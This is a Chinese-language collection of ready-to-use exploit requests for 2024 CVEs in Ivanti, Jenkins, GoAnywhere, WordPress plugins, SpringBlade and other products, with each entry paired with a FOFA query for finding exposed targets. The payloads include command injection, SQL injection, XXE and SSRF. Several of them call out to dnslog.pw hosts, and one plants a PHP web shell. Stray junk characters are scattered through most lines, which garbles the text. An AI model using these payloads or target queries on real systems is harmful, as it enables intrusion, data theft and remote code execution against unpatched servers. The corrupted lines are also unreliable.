X-Requested-With: XMLHttpRequest
3 h2 c' @" s2 r+ O+ h E; V( \
, L1 S9 A0 E5 c' H5 K5 D0 Bid=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B ^4 K8 z0 v3 D) i
' |' y" v3 M, E) }' D* n, d. A
0 M! S4 Z( {% D& {4 f99. Ncast盈可视高清智能录播系统busiFacade RCE
! p3 }3 n, W7 o. Z9 iCVE-2024-0305
8 w, p* Z9 O9 S$ R7 KFOFA:app="Ncast-产品" && title=="高清智能录播系统"
( x' L( ^5 K* @* I' h7 L O0 i/ sPOST /classes/common/busiFacade.php HTTP/1.17 S( }/ |+ y# T8 n- s3 d' M I
Host: 192.168.40.130:8080
1 q# H( [( c3 V5 O! bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0( J" N `4 f& E! q0 W' F
Connection: close/ e& S9 c8 g2 q" V4 |: V
Content-Length: 1545 c8 ^. I1 e* G/ ]& l4 E
Accept: */*9 ^/ c& l! o; G! \$ _. z! O4 k, I
Accept-Encoding: gzip, deflate" J6 e8 F. N) E- R5 z
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: B1 e) y; k) a6 h( R2 ~7 W# s' ^
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
/ R& y+ I, o* P7 `4 j/ E& TX-Requested-With: XMLHttpRequest3 _+ j4 }4 {+ e9 [5 r6 a% \5 U+ V1 \
3 O) K4 P* U3 T4 Q# E) n+ W3 C0 q
%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D: k9 r- ]$ R+ j5 H5 M/ g
9 h; s; o {, ]6 s/ P
3 A( ^( U$ t6 [/ F+ `4 O' J& a
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
# Q8 Y: ^+ N) h! \CVE-2024-0352
; q1 a: E" ~$ i7 BFOFA:icon_hash="874152924"
$ r z, `4 A [, MPOST /api/file/formimage HTTP/1.1
! h: P8 |$ o6 j6 P. z7 `Host: 192.168.40.130
) e+ l: P6 e- v% |" D9 RUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
6 F4 R. H7 L1 X4 L: x: fConnection: close
6 y* c, l" u. A Q1 uContent-Length: 201
% h- B- Y% z* F& R: ]Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
% \) v# u) {8 k H `* {Accept-Encoding: gzip1 a& ?; Y `3 U1 {2 C: w
# F. R: P2 h, P! y3 _
------WebKitFormBoundarygcflwtei! y( y6 }" ^9 k7 z' q2 x
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
4 m( ^5 L0 f$ w5 y. wContent-Type: application/x-php4 ^4 c% {2 W, Q2 g/ K2 p1 h, B9 r
- R: d& j1 Z5 o9 n1 K+ [2ayyhRXiAsKXL8olvF5s4qqyI2O! }3 `7 W# b2 m8 q6 @. {: P
------WebKitFormBoundarygcflwtei--) F/ b' L6 h% i) b, D f
`% q( n3 d7 ?" J0 y
3 N( Q2 q, }3 L8 e101. ivanti policy secure-22.6命令注入1 [6 k! {" t' v
CVE-2024-21887: p1 d* l% s7 V! B
FOFA:body="welcome.cgi?p=logo"- e: E: M) e$ c7 a1 e
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.11 {/ V* b/ y) Z( h6 S
Host: x.x.x.xx.x.x.x
; k" x0 @+ _1 cUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36# A! m; h2 m5 l/ j8 {/ F6 B( @
Connection: close
( y# _& y7 }. e. HAccept-Encoding: gzip
# X4 r- U. O* j! L+ q! h7 ^8 `3 O& I
2 P* C V( J% @3 {% K102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
: P8 S9 O7 q' b( t# [6 BCVE-2024-21893' n* z5 W0 L3 d8 V& d3 w4 h
FOFA:body="welcome.cgi?p=logo"
( R) m1 M0 }8 \# d# \+ `' n5 EPOST /dana-ws/saml20.ws HTTP/1.15 D+ \* D c5 ?* V+ W0 j# V" y5 F
Host: x.x.x.x
5 ` Y/ m E7 i% jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.364 P) X6 ~4 D+ U: u% t
Connection: close
Z2 c; L# Y/ n$ a( w0 p( _- OContent-Length: 792
T% X, |/ ~' K3 @$ {' HAccept-Encoding: gzip
1 m* k6 q, L8 Y% e5 S& ]3 e$ V5 y5 N$ u1 c1 X) B
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>
: B# E+ ~3 {* \; ~2 k
( A0 O; l. o7 P: j8 m$ s103. Ivanti Pulse Connect Secure VPN XXE, E6 v/ W/ k# W/ b J
CVE-2024-22024
) K! n. }; q1 rFOFA:body="welcome.cgi?p=logo"
# [/ o8 k6 c6 D+ [POST /dana-na/auth/saml-sso.cgi HTTP/1.1
# m" M, k3 N! K3 ^0 fHost: 192.168.40.130:111
( H- u; h3 T, s8 T) s; wUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36* I) T h2 F$ x* J
Connection: close- p: K/ g D0 E, w
Content-Length: 2041 S! ^* P% T8 J& u9 q
Content-Type: application/x-www-form-urlencoded8 C4 |: o! G3 w, _
Accept-Encoding: gzip
8 \! h# C0 ?. w/ H$ c/ o
" v% q7 _- K* ~/ a7 D! p+ LSAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==* m0 i- A" x% ^6 a4 B- D
3 u) b; v- ]4 S& S+ |( D) a3 Q
) X# \4 l, L8 x7 N! @! j$ M9 z! f其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
% ?" d5 {4 Z9 z$ ^2 P<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>
, H/ e) x2 x7 `9 V2 L- f8 r8 G9 Y
" C2 \, s* J8 t# k0 j+ q# B+ q6 n0 S0 w" L+ d2 t
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露8 h6 s& g: Z9 v) ^
CVE-2024-0569+ \) C) F+ s( \: w3 `# h
FOFA:title="TOTOLINK"
3 z: ]4 H. g7 i9 mPOST /cgi-bin/cstecgi.cgi HTTP/1.1
7 K- L& Q B# c% D" y& aHost:192.168.0.1
3 m: }: v8 i1 l7 pContent-Length:41
% S9 w8 r( Z" p+ l1 h+ C' M3 u* ]Accept:application/json,text/javascript,*/*;q=0.01* h/ b8 g b6 R: u K6 A7 }
X-Requested-with: XMLHttpRequest0 a3 e0 W3 K; a5 P) x4 P+ i
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36% A) w. v3 }8 q2 F R( H4 H& C. N/ o
Content-Type: application/x-www-form-urlencoded:charset=UTF-8
) _. [- K# \2 O9 COrigin: http://192.168.0.1
: i9 q4 G. D: e9 _: n- o1 AReferer: http://192.168.0.1/advance/index.html?time=1671152380564
2 }8 j M5 L1 }Accept-Encoding:gzip,deflate7 k4 z! {5 ^6 \6 n* h, ^
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.76 a2 m2 k# V$ S% G7 @4 X- d
Connection:close! T' H+ Y& C* T" X, R+ c% z( ]0 a/ N/ d
' D/ t5 {- m2 U" g1 R- K3 Q V0 H
{
2 q- V/ N* l8 z, D"topicurl":"getSysStatusCfg",% H$ \! h1 F0 F& }+ e) u
"token":""
) q/ r H% B, n! j}
3 C1 ?2 n, N; G/ r5 l/ K
7 ?, {- f2 B+ \+ ~6 n105. SpringBlade v3.2.0 export-user SQL 注入! r9 d$ U9 d4 U) k+ y
FOFA:body="https://bladex.vip"+ p1 J+ c8 n2 n+ q, E" @! n) H
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
3 P/ f1 L2 J" y: c# r! _, `( f. C+ Q
8 }# Q1 \3 _/ H6 h+ ?. ^1 y106. SpringBlade dict-biz/list SQL 注入
8 ~* n4 e8 q1 f, n% ?6 k8 [FOFA:body="Saber 将不能正常工作"9 f; V% }$ L- E# J- G% c" ~
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.11 t( U# m. I! u9 k7 L. e- m
Host: your-ip4 s" x7 f: O% \/ a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
0 w% k6 x! r( Q( {Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
8 g7 K$ j! F( E1 kAccept-Encoding: gzip, deflate7 [9 n3 ~9 J/ F
Accept-Language: zh-CN,zh;q=0.9
) w- p: k/ V- V! k8 t) c, PConnection: close" b0 S+ v. ~$ z
8 s+ j7 L9 ~ N) `" K8 Q/ q7 q4 ?9 A- @$ F9 g
107. SpringBlade tenant/list SQL 注入9 i5 K8 R y8 q3 Y
FOFA:body="https://bladex.vip", ^" u( k, `& {5 ?4 v, o2 f0 D
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.19 T( T1 E* _7 ]& C6 I8 O1 E6 V0 q
Host: your-ip% u# I. Q* {8 y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
0 d+ r, M- j0 }- v4 ]" D( ~( i7 ZBlade-Auth:替换为自己的4 G/ a/ i# R( v6 ]! F1 f
Connection: close
: j- i. k4 t+ n& }- F2 Q- E% x
6 b* P+ ?8 J% z( ?6 y% w( X8 J- X T
108. D-Tale 3.9.0 SSRF" _. E" I0 l2 s1 K @6 g
CVE-2024-21642
/ S- ?! x" P5 n& y5 J$ h! lFOFA:"dtale/static/images/favicon.png"
/ L3 l! A7 j2 A9 p6 I7 NGET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1; _1 I% Y0 @5 C* V. H4 I" b/ b
Host: your-ip, ~# g; o a2 f$ | h2 U; z
Accept: application/json, text/plain, */*( K2 @3 l8 s0 ^* w$ Q7 D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
' Y- d3 r% u4 a7 `* z; g. e& f! ~3 HAccept-Encoding: gzip, deflate0 x x1 x4 r- |
Accept-Language: zh-CN,zh;q=0.9,en;q=0.82 B7 N! m! z! X
Connection: close
% D6 j5 }" a" {- N3 q0 i/ O5 e2 Y2 z- F& k" S
& M' E! w+ U- ?109. Jenkins CLI 任意文件读取
7 z2 ^4 F% U. s) O qCVE-2024-23897
; n# i; q; ]4 v% \' a9 I# _FOFA:header="X-Jenkins"+ `/ d7 z% X8 f [& {3 b
POST /cli?remoting=false HTTP/1.1
% \9 `+ w1 l; ]' Y: bHost:
. K% ]2 p- e; X$ j) PContent-type: application/octet-stream, N2 ]- l/ l" e* L* u
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92/ J. g1 G( Z9 L. Y( ]
Side: upload& T3 H% ]+ Z# L0 o- Z+ d+ N: ^
Connection: keep-alive% Q% y* g$ e% D+ n ] [
Content-Length: 1634 |, H& @$ `* R% i% J/ a5 u2 V
1 Z3 O) o# {+ R: A# F, e
b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'# f$ g% e6 F; S3 p; n2 Y
+ |; l) p; X" n
$ q$ f/ |$ U, j
POST /cli?remoting=false HTTP/1.1* P4 a$ N, n# P
Host:
# `4 i5 S2 Z0 f5 ~# i# FSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
' n( V# D4 C( A6 Y7 Tdownload
- Q N3 h" J& r3 n$ V2 [Content-Type: application/x-www-form-urlencoded
! _5 V# P4 f5 ]) d; ?1 ~Content-Length: 0
, v X/ m/ _% E- v& k ~6 N: Z3 x; M% k* u
1 i* ^% J3 D+ l$ q, \- H+ O
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin3 a8 Q/ Q: B+ S. L: {) S
java -jar jenkins-cli.jar help
3 X' ^! w+ n- R+ g7 l[COMMAND]
4 @9 r$ Y. V" HLists all the available commands or a detailed description of single command.: z% V& @- B/ y+ @8 {' b/ O* n
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)+ j3 J0 {+ c/ \+ X# v) Q
0 ~4 d$ M7 H2 X) T, y: ?- f% B; [* Q, Y) g: P+ u) c
110. Goanywhere MFT 未授权创建管理员
! A+ v7 \/ L8 n- NCVE-2024-0204( S& ], p2 m* y7 M/ G4 G/ D! ~
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
' S& ?* h1 K$ `5 @2 S6 V% yGET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1. N' i9 d% j+ w
Host: 192.168.40.130:8000, c8 S5 P; B/ E1 q3 H
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36. P0 L" K, _$ Z" h' E6 g4 P
Connection: close
1 w4 }* l& [4 |, K! xAccept: */*6 @: t9 Q# t4 C. x5 b4 w: R4 a9 \
Accept-Language: en m# s* z6 ^; d) [
Accept-Encoding: gzip3 K6 C6 `+ ^( V. z+ | f* n: m6 x2 \
0 ~; o0 |7 Z' f0 f% U+ S. S/ A9 ]0 \. G$ A; c$ ]; b5 p% ?
111. WordPress Plugin HTML5 Video Player SQL注入
) }, J, [2 W5 }. ZCVE-2024-1061+ n5 {" C% H1 r% [6 ^3 C5 P3 _
FOFA:"wordpress" && body="html5-video-player"! b. `; l# v$ x- l2 W- ]0 C
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
# ^7 H, ^/ I+ W1 w; x, h' D+ a# ^" \4 t) XHost: 192.168.40.130:112% z8 g& T, `6 E# T* k0 X& D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
' o3 W. ]" M6 T, d( NConnection: close( @' ~) _, f$ }; l* a c6 `7 L
Accept: */*" G6 a j6 `6 m6 S, K
Accept-Language: en6 a- V) X5 J7 g5 k# O) m3 g
Accept-Encoding: gzip9 a3 D; {' o% h( _
! `% P: F7 H( _% ~( p9 R
, c' m+ G; D/ G; H112. WordPress Plugin NotificationX SQL 注入
) {" g d1 k0 T. c z+ ~# ^CVE-2024-1698/ O3 c/ u# I' e0 z2 @$ t
FOFA:body="/wp-content/plugins/notificationx"
( ?: O- G3 \% A/ ?POST /wp-json/notificationx/v1/analytics HTTP/1.1
: N% s+ |* x$ [2 E0 t8 E4 {4 Z# MHost: {{Hostname}}
' o1 D4 f1 |& wContent-Type: application/json
; @$ x9 h0 V \- \+ n
- R b' `9 E* v2 [5 v% Z F{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}, R$ Z' T) v8 C& K, ^
6 t& R& C2 A% K3 {1 Y" s
z7 b6 {- R% ]$ [
113. WordPress Automatic 插件任意文件下载和SSRF
" D0 Y: D; b6 a2 Y- w' C* W7 b0 f0 v) YCVE-2024-279542 h5 o" C& d% \1 Z; p7 x0 d. J
FOFA:"/wp-content/plugins/wp-automatic"
* ]/ v& ]# m( ]- b" h) wGET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1( ^8 j) F9 J; y# ~
Host: x.x.x.x
% A3 @+ B) ^ xUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.366 |. D) q" P X4 ~1 `8 g9 m# K
Connection: close/ ~5 w! f4 q, R M
Accept: */*
" ~# r; [6 p& f$ c; aAccept-Language: en0 \; ?0 y# c. S; O
Accept-Encoding: gzip9 ]' u/ t+ y& M2 q3 N* [% C
' A. W! @! z& K5 x& F- v: q! U" Z* t/ E' F9 p+ ~
114. WordPress MasterStudy LMS插件 SQL注入* X& L4 Q7 C2 i( q/ `% S' o
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"! J- a; l/ ~0 Y& f# ` J! z0 j
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1& I) x5 Z& x3 T) ~
Host: your-ip* g4 K; u# R n5 d: d
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.367 E: n0 O$ e/ ?4 w, O
Accept-Charset: utf-8/ C' { p M1 c; _
Accept-Encoding: gzip, deflate. H& R# V* b9 r7 M) i7 s& [
Connection: close* S. C6 U! T4 |
9 M% A- c) o1 D9 C
: Y8 l# c, U- d+ b' S115. WordPress Bricks Builder <= 1.9.6 RCE- M( Y, E4 z: U
CVE-2024-25600
0 W& b$ i# C# C- n: G6 v* r- [FOFA: body="/wp-content/themes/bricks/"
5 X- h) `1 c- T# q8 { C第一步,获取网站的nonce值$ m3 C, x9 l) A& n' M9 v8 `( @; }& U
GET / HTTP/1.1# b( O+ T4 l$ q5 _8 R
Host: x.x.x.x
& w5 n9 J8 y; R2 eUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.364 z/ g2 V, c" A: O
Connection: close; w! [/ _6 y' ]0 x! I
Accept-Encoding: gzip5 X+ z' M' F9 a7 w
0 F$ U& r0 f7 v) f
7 {, A7 g- o2 y; Y! i2 C: Z第二步替换nonce值,执行命令( f' G. [9 o: ^, Z, a, J/ I" ^
POST /wp-json/bricks/v1/render_element HTTP/1.1( A5 ~& T$ t( w! [
Host: x.x.x.x
7 u' L) j O. {- z7 [- F7 ]User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
x% d) s8 B- n& X3 @" m" A5 b# zConnection: close8 ~' n$ e9 y) R
Content-Length: 3566 ?( q7 ]( V. e, e4 b) ?
Content-Type: application/json
3 U. l0 N w5 d+ V$ QAccept-Encoding: gzip% R# K' F/ t2 I
; @8 C0 V2 m2 \, Z; U1 O. Z
{
) G5 ?9 J! Z' f* @"postId": "1",6 s9 S8 b0 b' F4 R0 L6 G/ T
"nonce": "第一步获得的值",
* e! a% V7 {" \. Q "element": {
$ [$ Q* U. e* Z* s2 S "name": "container",
! `5 \/ W2 n( m% w/ s" E1 Z \! V, Z "settings": {8 C0 \, `% a) x5 T1 F3 m
"hasLoop": "true",( p$ W7 J1 S+ g8 V2 `4 C
"query": {6 p4 j8 I. h! K
"useQueryEditor": true,9 N- I6 O, F( b$ S D0 A% B
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",* ?, _. h( d. r( P5 Q+ D& b
"objectType": "post"
1 [3 v3 s5 l8 t! K* q }
& q; l. s% o5 l, X1 E }
" |& O- t! F5 R3 s& H }, @1 _! P. [2 d3 _8 ] l
}
" Q9 k7 ~: @. E5 [; U+ z
8 F _+ X1 Y( O+ ~' B6 D' w3 E! \/ S8 V0 x
116. wordpress js-support-ticket文件上传
3 Z* \; e r2 A- T1 O' n" IFOFA:body="wp-content/plugins/js-support-ticket"
5 F0 |* m _8 w$ {* q/ vPOST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
8 B) }8 y& R0 W/ P) o7 r, W- rHost:
: f8 s. j% b2 Z& t5 J; X5 n6 XContent-Type: multipart/form-data; boundary=--------767099171& `+ m; H1 Q8 Y
User-Agent: Mozilla/5.0
' r( v, X" L% q+ @+ O9 u3 h
& g6 g8 M! f3 ]! J----------767099171& e- y1 ~: D5 m7 |; x1 @
Content-Disposition: form-data; name="action"
1 o, B( ~5 K0 ]; c oconfiguration_saveconfiguration
P( A" n: v7 t- [ O9 n' ?2 r: B----------767099171
9 l q2 s5 e5 H: u( s, k; B$ a: OContent-Disposition: form-data; name="form_request"( @( S$ a, y& p0 A" }
jssupportticket1 w) r6 S7 C: _1 n0 b' S
----------767099171
4 D1 {/ Q$ g3 }6 v% `: nContent-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"& N3 L8 W+ @! |: O4 T
Content-Type: image/png
9 }. o' V% b5 U; |5 b) f. l% X1 C----------767099171--) M" K6 H6 }+ t8 B C
9 y; v9 q- n8 k
& L7 ?/ d! Y4 J' Z" `117. WordPress LayerSlider插件SQL注入3 {2 {" V' \9 L5 J* y) Y' |- b
version:7.9.11 – 7.10.0
/ H+ j& q9 z/ D. U; hFOFA:body="/wp-content/plugins/LayerSlider/"
8 D! G8 T8 ^6 w5 z+ } |) kGET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
5 c Q. v( d# k; FHost: your-ip# `. U7 O2 ]" {! I# I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0; i% F& A6 q$ R' w* f
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.82 e& R, T4 b4 R( [4 _
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
5 A9 s$ u, o2 t: W" u1 GAccept-Encoding: gzip, deflate, br
% h) P& ^& }7 L7 s X+ X( w& iConnection: close
) v5 p9 Q/ j, [* r9 i- K3 VUpgrade-Insecure-Requests: 1
0 S# B7 v. ^# P2 N! w
' K. j/ N6 Q1 M: T* d: u2 _) {, E5 I) ^6 b
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传( Q' D% A, k- H0 @0 N, T! Y
CVE-2024-0939
, @ u/ U9 w$ D3 s3 R6 _FOFA:title="Smart管理平台"3 O1 Q& l! O2 G8 c7 L
POST /Tool/uploadfile.php? HTTP/1.1, R/ \- X B* G
Host: 192.168.40.130:8443# p( F6 E9 t: K( r, ]' r
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8( M7 W. p' t( d: [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0. m0 e" }0 q/ ?3 h3 T
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8. P+ g4 U8 o+ B% T* |. ]% |. u
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2+ Q! [- o9 @2 M1 J
Accept-Encoding: gzip, deflate2 v6 O5 J, Y: ]* ]' I& N z
Content-Type: multipart/form-data; boundary=---------------------------139797012227476466340371828874 J6 Q+ x \5 G6 o
Content-Length: 405$ E4 ]: c- @2 \# j
Origin: https://192.168.40.130:8443
. H1 N' p, @3 n" \8 Z: P) W' c% KReferer: https://192.168.40.130:8443/Tool/uploadfile.php
# Q3 G# w* a- r4 z$ p' TUpgrade-Insecure-Requests: 12 [# a5 S* Y+ m: E
Sec-Fetch-Dest: document
5 y, S2 w) R+ A+ S- aSec-Fetch-Mode: navigate
1 S4 I+ ^/ C( O+ i$ a/ jSec-Fetch-Site: same-origin
9 ?* } E" c" Z& [5 b/ S U4 hSec-Fetch-User: ?1
! k) o3 C* ?* m& ~1 Q, zTe: trailers5 O. c% W1 F7 P L$ f* @- I
Connection: close+ C1 S+ A: F# }* S2 |$ S: |" x. X
7 ]3 M6 f& w% Z6 j8 t# u-----------------------------13979701222747646634037182887+ p& S& s; v: U7 R( ^: g
Content-Disposition: form-data; name="file_upload"; filename="contents.php"4 c( A6 V' x, S: \
Content-Type: application/octet-stream7 w2 {8 B, G5 m" I
$ ]- E( h4 Z* g E<?php6 b; Z7 g* O6 N/ ]. M% F7 E/ B
system($_POST["passwd"]);7 ~6 X+ X& L* z: X
?>1 E' w3 `- p0 R& N1 ] L; |
-----------------------------13979701222747646634037182887
, n5 y& b) y/ y4 NContent-Disposition: form-data; name="txt_path"
: X! j/ ?4 b$ L9 W. R
2 @) f+ r: }6 w7 _4 ]8 l$ x* u5 {' V/home/src.php7 q6 M1 c4 s, @9 |
-----------------------------13979701222747646634037182887--
' v# f7 y) _, ^5 s4 ^2 b& g$ g; ?: z4 q4 a! Y/ O: Q% K
# F8 `9 b4 p& P; d访问/home/src.php7 X! |, Q& w$ U& s8 Q( b$ k6 j, E, o
: H2 V7 x! s3 R2 |( }- G' J
119. 北京百绰智能S20后台sysmanageajax.php sql注入
& [8 [0 [$ b+ N1 k: a3 d9 M, \CVE-2024-1254) w' B `3 t3 G/ O
FOFA:title="Smart管理平台"% y o6 x i$ q: s/ a
先登录进入系统,默认账号密码为admin/admin; ]1 X1 {5 T5 j4 ?
POST /sysmanage/sysmanageajax.php HTTP/1.110 z7 l, {7 @* o
Host: x.x.x.x2 L3 j7 X- m" [3 n
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee7 w% o; N- p- L' {) E8 B$ `* |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0& l% I. ~$ g1 f4 h/ W2 u( {
Accept: */*
9 h( ^% k7 v& l1 x7 g3 pAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 m# ~% `2 f5 J3 |8 E8 G# b
Accept-Encoding: gzip, deflate( g7 n) T+ E) W6 C' R2 L
Content-Type: application/x-www-form-urlencoded;
6 a* q$ N" S: O9 c% mContent-Length: 1092 H& a" M( K: [' h/ _& j
Origin: https://58.18.133.60:8443
) I6 ^" G+ W9 k2 M9 P5 qReferer: https://58.18.133.60:8443/sysmanage/manageadmin.php& |8 }) i& H6 {2 t$ {
Sec-Fetch-Dest: empty5 I5 m# }8 z, z& ^9 b' [
Sec-Fetch-Mode: cors% R4 M$ D. Q8 P8 S" f: m& Q
Sec-Fetch-Site: same-origin
9 R( [- o6 _8 f% |X-Forwarded-For: 1.1.1.14 e+ c4 B- o" x7 `4 [2 Z E
X-Originating-Ip: 1.1.1.1% }' @6 A" R" |, t0 @. x
X-Remote-Ip: 1.1.1.1, T- o8 W M D1 }* M
X-Remote-Addr: 1.1.1.1
4 b- d8 \, N/ |# PTe: trailers
. _! A' c) s2 Z( Y7 XConnection: close
4 N, t3 Q( ^, M @3 X [
